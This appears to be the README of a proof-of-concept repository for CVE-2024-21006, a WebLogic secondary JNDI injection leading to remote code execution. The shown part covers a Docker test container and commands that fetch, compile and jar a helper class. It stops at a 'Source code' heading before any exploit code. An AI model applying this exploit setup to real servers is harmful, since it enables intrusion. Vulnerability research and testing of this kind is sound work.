WebLogic - CVE-2024-21006
CVE-2024-21006 reveals a new WebLogic attack method: secondary JNDI injection, that is, triggering JNDI injection during the JNDI injection process, thereby completing RCE.
This project is based on the findings of pwnull and code from momika223.
Proof-of-Concept
Oracle 14.1.1.0
apt :: ~ » docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
fa9822b7dfd5 container-registry.oracle.com/middleware/weblogic:14.1.1.0 "/u01/oracle/createA…" 23 hours ago Up 2 hours 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp 14110-weblogic
Prepare the environment by uploading MainClass.java and META-INF/MANIFEST.MF to the WebLogic container.
[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MainClass.java
[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MANIFEST.MF
[oracle@14110-weblogic lib]$ mkdir META-INF
[oracle@14110-weblogic lib]$ mv MANIFEST.MF META-INF/
Compile the code.
[oracle@14110-weblogic lib]$ javac -cp /u01/oracle/wlserver/server/lib/weblogic.jar MainClass.java
[oracle@14110-weblogic lib]$ ls -al | grep MainClass
-rw-rw-r-- 1 oracle oracle 2033 Oct 10 08:03 MainClass$1.class
-rw-rw-r-- 1 oracle oracle 1386 Oct 10 08:03 MainClass.class
-rw-rw-r-- 1 oracle oracle 3717 Oct 10 08:01 MainClass.java
[oracle@14110-weblogic lib]$ jar cvfm cve-2024-21006.jar META-INF/MANIFEST.MF *.class
added manifest
adding: MainClass$1.class(in = 2033) (out= 671)(deflated 66%)
adding: MainClass.class(in = 2161) (out= 1100)(deflated 49%)
Source code